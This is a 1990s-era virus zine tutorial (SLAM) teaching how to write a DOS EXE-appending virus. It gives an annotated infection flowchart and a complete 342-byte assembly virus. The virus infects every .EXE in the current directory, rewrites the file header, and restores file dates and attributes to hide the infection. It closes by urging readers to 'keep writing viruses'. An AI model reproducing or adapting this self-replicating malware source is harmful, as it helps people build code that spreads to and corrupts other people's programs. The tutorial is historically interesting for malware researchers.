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SLAM3.026: EXE Appending Virus Tutorial by Stealth Warrior [SLAM]

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Published in 
 · 26 Feb 2022

Stealth Warrior's EXE Appending Virus Tutorial
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So, now when we know how to infect .COM files, it's time to learn about .EXEs.
First of all you have to be familiar with EXE header. It's in the beginning of every standard EXE file and it looks like this:

| 00h | EXE file ID word: MZ or ZM |
| ˚ 02h | Number of bytes in the last page in the file |
| ˚ 04h | Number of pages* in the file, rounded up |
| 06h | Number of entries in segment table |
| 08h | Size of the header in paragraphs** |
| 0Ah | Minimum memory allocated to file - in paragraphs |
| 0Ch | Maximum memory allocated to file - in paragraphs |
| ˚ 0Eh | Initial offset in paragraphs to stack segment from header (SS) |
| 10h | Initial offset in bytes of stack ptr from stack segment (SP) |
| 12h | Negative checksum |
| ˚ 14h | Initial offset in bytes of instruction ptr from code segment (IP)|
| ˚ 16h | Initial offset in paragraphs of code segment from header (CS) |
| 18h | Offset of relocation table from start of file |
| 1Ah | Overlay number |

˚Important OFFSETS (for a virus)
*page is 512 bytes long
**paragraph is 16 bytes long

What our virus has to do? First, something very important. When an EXE file is loaded, PSP is built, but CS doesn't point to it! Instead, it points to the entry point, while the DS and ES point to the PSP. That's why our virus has to restore initial DS and ES before passing control to the host.

And here's flow-chart:

  1. Calculate the delta OFFSET.
  2. Restore parts of the header - in memory of course!
  3. Save DTA.
  4. Find a .EXE file. If no files found then go to step 17.
  5. Save file attributes, date and time.
  6. Clear file attributes.
  7. Open the file for reading/writing.
  8. Read the header.
  9. Check if the file is already infected.
    • a)If already infected then go to step 16.
    • b)If not infected continue.

  10. Save important parts of the header for later use.
  11. Calculate new values for the header.
  12. Append the virus to the file.
  13. Write new header to the file.
  14. Restore time and date.
  15. Close the file.
  16. Restore attributes.
  17. Restore DTA.
  18. Pass the control to the host (in memory!).

Here's how it's done:
1. Nothing new here, except there are no three bytes(0e9h,0,0) used to jump to vstart.

        vstart: call doit 
doit: pop bp ;<Calculate the
sub bp,OFFSET doit ; delta OFFSET.>

2. And now we restore DS, ES and saved parts of the header:

        push ds 
push es
push cs
pop ds
push cs
pop es
lea si,[bp+OFFSET orgCSIP2]
lea di,[bp+OFFSET orgCSIP]

3. Nothing new...

        lea  dx,[bp+OFFSET dta]           ;<Save disk 
mov ah,1ah ; transfer
int 21h ; area(DTA).>

We have to define dta, so:

        dta db 42 dup (?) 

4. You know this...

        mov  ah,4eh                       ;Find first service. 
lea dx,[bp+exe_files] ;<Search for an .EXE file
mov cx,7 ; with any attributes.>
int 21h

We have to define what exe_files means, so:

     exe_files: db "*.exe",0

5. Nothing new...

        lea  si,[bp+OFFSET dta+21]        ;<Save file 
mov cx,5 ; attributes,
lea di,[bp+OFFSET attributes] ; date and
rep movsb ; time.>

6. Old stuff...

        mov  ax,4301h                     ;<Clear 
xor cx,cx ; the
lea dx,[bp+dta+30] ; file
int 21h ; attributes.>

7. Nothing new here...

        mov  ax,3d02h                     ;<Open file for 
lea dx,[bp+OFFSET dta+30] ; reading and
int 21h ; writing.>

8. Here we read the header and store it to buffer. We need it to check if the file is already infected and to restore it before we pass control to the host.

        xchg ax,bx                        ;Put file handle in bx. 
mov ah,3fh ;<Read first
lea dx,[bp+buffer] ; 1ah bytes
mov cx,1ah ; and store them
int 21h ; in buffer.>

9. Here we compare our ID with the value at OFFSET 10h of the header. If it's the same then the file is infected. This is an appropriate location for our ID. You can use OFFSET 12h instead if you wish.

        cmp  byte ptr [bp+buffer+10h],ID  ;Is the file infected? 
jz another ;Yes,so find next victim.

10. Here we push cx (1ah=length of the header) for later use. We also save bx (file handle) so that it isn't destroyed by following operations. The most important thing of this part is saving all data from the header which will need to be restored. It's a pretty odd way, but if you know a shorter one, email me :)

        mov  cx,1ah 
push cx
push bx ;Save file handle.
les ax,dword ptr [bp+buffer+14h] ;<Save
mov word ptr [bp+orgCSIP2],ax ; important
mov word ptr [bp+orgCSIP2+2],es ; (for a virus)
les ax,dword ptr [bp+buffer+0eh] ; parts
mov word ptr [bp+orgSSSP2],es ; of the
mov word ptr [bp+orgSSSP2+2],ax ; header.>

11. In this part we have to calculate new values to be written to the header. The only tricky part is where we need the number of bytes in the last page in the file. But with a bit of math it's done... Let's take a 1026-byte file, for example:

               PAGE 1               PAGE 2              PAGE 3 
|********************|********************|** |
512 1024

OFFSET 02 : 2 ( 1026-2*(512)=2 )
OFFSET 04 : 3 ( 3*512>1026>2*512, look at the picture above)

mov ax,word ptr [bp+buffer+8] ;<Get header
mov cl,4 ; length and
shl ax,cl ; convert it
xchg ax,bx ; to bytes.>
les ax,dword ptr [bp+dta+1ah] ;<Get file
mov dx,es ; size and
push ax ; store it
push dx ; for later.>
sub ax,bx ;<Subtract header size
sbb dx,0 ; from the file size
mov cx,10h ; and convert it to
div cx ; SEGMENT:OFFSET form.>
mov word ptr [bp+buffer+14h],dx ;New entry point.
mov word ptr [bp+buffer+16h],ax ;New OFFSET of code segment.
mov word ptr [bp+buffer+0eh],ax ;New OFFSET of stack segment.
mov word ptr [bp+buffer+10h],ID ;Our ID.
pop dx ;<Get file
pop ax ; length.>
pop bx ;Restore file handle.
add ax,vend-vstart ;<Add the size of the
adc dx,0 ; virus to the file length.>
mov cl,9 ;Length of a page=512=2^9.
push ax ;<Calculate
shr ax,cl ; the new
ror dx,cl ; number of
stc ; pages and
adc dx,ax ; the number
pop ax ; of bytes in
and ah,1 ; the last page.>
mov word ptr [bp+buffer+4],dx ;New number of pages.
mov word ptr [bp+buffer+2],ax ;New remainder.
push cs ;<Save cs and
pop es ; restore es.>

12. And now-40h, my favorite function...

        mov  ah,40h                       ;<Append 
lea dx,[bp+OFFSET vstart] ; the virus
mov cx,vend-vstart ; to the
int 21h ; file.>

13. Here we write a new header to the file (from the buffer):

        mov  ax,4200h                     ;<Go to the 
xor cx,cx ; beginning
cwd ; of the
int 21h ; file.>
mov ah,40h ;<Write new
lea dx,[bp+OFFSET buffer] ; header
pop cx ; to the
int 21h ; file.>

14. Now this looks familiar... :)

        mov  ax,5701h                     ;<Restore 
mov dx,word ptr [bp+date] ; original
mov cx,word ptr [bp+time] ; file time
int 21h ; and date.>

15. Close the file, nothing new...

        mov  ah,3eh                       ;<Close the 
int 21h ; file.>

16. Blah, blah...

        mov  ax,4301h                     ;<Restore 
lea dx,[bp+OFFSET dta+30] ; original
xor ch,ch ; attributes
mov cl,byte ptr [bp+attributes] ; of the
int 21h ; file.>

17. Nothin' new...

        mov  dx,80h                       ;Restore DTA. 
mov ah,1ah ;<Set disk transfer
int 21h ; address.>

18. Here we pass control to the host (in memory!!!):

        pop  es                           ;Restore es. 
pop ds ;Restore ds.
mov ax,es ;ax<-PSP segment.
add ax,10h ;Adjust it for PSP.
add word ptr cs:[bp+orgCSIP+2],ax;
add ax,word ptr cs:[bp+orgSSSP+2];
cli ;Clear int's for stack manipulation.
mov sp,word ptr cs:[bp+orgSSSP] ;Adjust sp.
mov ss,ax ;Adjust ss.
db 0eah ;Return control to the host.

We also need this:

        orgCSIP dd ?                              ;Original CS:IP. 
orgSSSP dd ? ;Original SS:SP.
orgCSIP2 dd 0fff00000h ;Needed for carrier file.
orgSSSP2 dd ?

Here's the complete source:

;Example 1 from .EXE Appending Virus Tutorial by Stealth Warrior
;.EXE appending virus - 342 bytes long, infects all .EXE files in current dir
.model tiny
org 100h
ID = 'SW' ;Our ID...
vstart: call doit
doit: pop bp ;<Calculate the
sub bp,OFFSET doit ; delta OFFSET.>
push ds
push es
push cs
pop ds
push cs
pop es
lea si,[bp+OFFSET orgCSIP2]
lea di,[bp+OFFSET orgCSIP]
lea dx,[bp+OFFSET dta] ;<Save disk
mov ah,1ah ; transfer
int 21h ; area(DTA).>
first: mov ah,4eh ;Find first service.
lea dx,[bp+exe_files] ;<Search for a .EXE file
mov cx,7 ; with any attributes.>
next: int 21h
jnb got_it ;We found a .EXE file.
jmp quit ;No more .EXE files,so quit.
got_it: lea si,[bp+OFFSET dta+21] ;<Save file
mov cx,5 ; attributes,
lea di,[bp+OFFSET attributes] ; date and
rep movsb ; time.>
mov ax,4301h ;<Clear
xor cx,cx ; the
lea dx,[bp+dta+1eh] ; file
int 21h ; attributes.>
mov ax,3d02h ;<Open file for
lea dx,[bp+OFFSET dta+1eh] ; reading and
int 21h ; writing.>
xchg ax,bx ;Put file handle in ax.
mov ah,3fh ;<Read first
lea dx,[bp+OFFSET buffer] ; 1ah bytes and
mov cx,1ah ; save them to
int 21h ; buffer.>
mov ax,4202h ;<Go to
xor cx,cx ; the
cwd ; end of
int 21h ; file.>
cmp word ptr [bp+buffer+10h],ID ;Already infected?
jnz infect ;No,so infect it.
jmp another ;Yes,so get another.
infect: mov cx,1ah
push cx
push bx ;Save file handle.
les ax,dword ptr [bp+buffer+14h] ;<Save
mov word ptr [bp+orgCSIP2],ax ; important
mov word ptr [bp+orgCSIP2+2],es ; (for a virus)
les ax,dword ptr [bp+buffer+0eh] ; parts
mov word ptr [bp+orgSSSP2],es ; of the
mov word ptr [bp+orgSSSP2+2],ax ; header.>
mov ax,word ptr [bp+buffer+8] ;<Get header
mov cl,4 ; length and
shl ax,cl ; convert it
xchg ax,bx ; to bytes.>
les ax,dword ptr [bp+dta+1ah] ;<Get file
mov dx,es ; size and
push ax ; store it
push dx ; for later.>
sub ax,bx ;<Subtract header size
sbb dx,0 ; from the file size
mov cx,10h ; and convert it to
div cx ; SEGMENT:OFFSET form.>
mov word ptr [bp+buffer+14h],dx ;New entry point.
mov word ptr [bp+buffer+16h],ax ;New OFFSET of code segment.
mov word ptr [bp+buffer+0eh],ax ;New OFFSET of stack segment.
mov word ptr [bp+buffer+10h],ID ;Our ID.
pop dx ;<Get file
pop ax ; length.>
pop bx ;Restore file handle.
add ax,vend-vstart ;<Add the size of the
adc dx,0 ; virus to the file length.>
mov cl,9 ;Length of a page=512=2^9.
push ax ;<Calculate
shr ax,cl ; the new
ror dx,cl ; number of
stc ; pages and
adc dx,ax ; the number
pop ax ; of bytes in
and ah,1 ; the last page.>
mov word ptr [bp+buffer+4],dx ;New number of pages.
mov word ptr [bp+buffer+2],ax ;New remainder.
push cs ;<Save cs and
pop es ; restore es.>
mov ah,40h ;<Append
lea dx,[bp+OFFSET vstart] ; the virus
mov cx,vend-vstart ; to the
int 21h ; file.>
mov ax,4200h ;<Go to the
xor cx,cx ; beginning
cwd ; of the
int 21h ; file.>
mov ah,40h ;<Write new
lea dx,[bp+OFFSET buffer] ; header
pop cx ; to the
int 21h ; file.>
mov ax,5701h ;<Restore
mov dx,word ptr [bp+date] ; original
mov cx,word ptr [bp+time] ; file time
int 21h ; and date.>
mov ah,3eh ;<Close the
int 21h ; file.>
another:mov ax,4301h ;<Restore
lea dx,[bp+OFFSET dta+1eh] ; original
xor ch,ch ; attributes
mov cl,byte ptr [bp+attributes] ; of the
int 21h ; file.>
mov ah,4fh ;Find next service.
jmp next ;Do it.
quit: mov dx,80h ;Restore DTA.
mov ah,1ah ;<Set disk transfer
int 21h ; address.>
pop es ;Restore es.
pop ds ;Restore ds.
mov ax,es ;ax<-PSP segment.
add ax,10h ;Adjust it for PSP.
add word ptr cs:[bp+orgCSIP+2],ax
add ax,word ptr cs:[bp+orgSSSP+2]
cli ;Clear int's for stack manipulation.
mov sp,word ptr cs:[bp+orgSSSP] ;Adjust sp.
mov ss,ax ;Adjust ss.
db 0eah ;Return control to the host.

orgCSIP dd ? ;Original CS:IP.
orgSSSP dd ? ;Original SS:SP.
orgCSIP2 dd 0fff00000h ;Needed for carrier file.
orgSSSP2 dd ?

exe_files db '*.exe',0
vend equ $ ;<Everything below this point
; isn't written to a host because
; it's temporal info and would
; just increase the size of the
; virus.>
attributes db ? ;Here we put file attributes.
time dw ? ;Here we put file time.
date dw ? ;Here we put file date.
dta db 42 dup (?) ;Here we put DTA.
buffer db 1ah dup (?) ;Here we put header.
end vstart

That's it for EXE infectors. If you don't get it yet, read all my previous tutorials and you'll get it, don't worry. Stay tuned for new tutorials by me!
Oh yeah, keep writing viruses!

Greetz'n'thanx to:

  • Alliance: yo to all memberz
  • P/S: a great group, your tutorials and 40hex helped me a lot
  • NuKE: a great group too
  • VLAD: a great magazine, guys
  • Immortal Riot: I like your 'zine
  • Ratboy: cool tutorial
  • Dark Avenger: DAV lives... somewhere in time
  • all virii zines: I love reading them...
  • all other wirus writers in the world!

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